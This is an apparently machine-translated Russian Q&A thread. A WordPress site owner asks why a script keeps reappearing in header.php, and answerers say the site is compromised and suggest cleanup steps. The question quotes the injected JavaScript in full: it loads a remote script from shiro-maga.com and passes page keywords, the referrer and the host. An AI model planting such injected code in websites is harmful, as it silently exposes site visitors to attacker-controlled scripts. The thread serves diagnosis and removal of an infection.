2016-02-12 4 views
2

Мой сайт является сайтом wordpress. следующий код появляется в Header.php каждые несколько часов, когда я его удаляю, он появляется снова через несколько часов. Обратите внимание, что ссылка в коде «shiro-maga.com» меняется каждый раз. Код выглядит следующим образом:Источник сценария в header.php

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

Я считаю, что тема не заражен «показать сканирование не вредоносных программ», так это создать этот сценарий. не могли бы вы посоветовать, как найти источник этого сценария?

Thanks

+0

Возможно, это что-то добавленное Wordpress (или вашим сервером). Это не похоже на что-то странное. За исключением одного домена. Я не думаю, что это настоящий хост jquery. – durbnpoisn

ответ

0

Определенно вредоносный. Ваш сайт был скомпрометирован. Вы можете использовать следующую подробную статью, чтобы найти и удалить источник заражения. http://ottopress.com/2009/hacked-wordpress-backdoors/. Программа, подобная Windows Grep, поможет вам быстро выполнить сканирование всех ваших файлов тем для таких ключевых слов, как eval и base64. Удалите все подозрительные жало из вашей темы, а затем обновите основные файлы WordPress, чтобы убедиться, что вы используете чистую версию. Кроме того, если у вас есть резервная копия, восстановите резервную копию своей темы и обновите свой сайт чистой обновленной версией WP.

+0

Спасибо за ответ. Кажется, есть много файлов с этими ключевыми словами, и я не могу найти подозрительные. Еще раз спасибо –

+0

, чтобы предотвратить редактирование скрипта header.php? –

+0

Если вы не удалите скрипт, который продолжает его вводить. Каков ваш домен? – user1724434

0

Быстрое исправление для предотвращения повторного заражения - CHMOD header.php до 444 (только для чтения). Сайт будет работать и не будет повторно заражен, давая вам время, чтобы найти инфекцию.

Смежные вопросы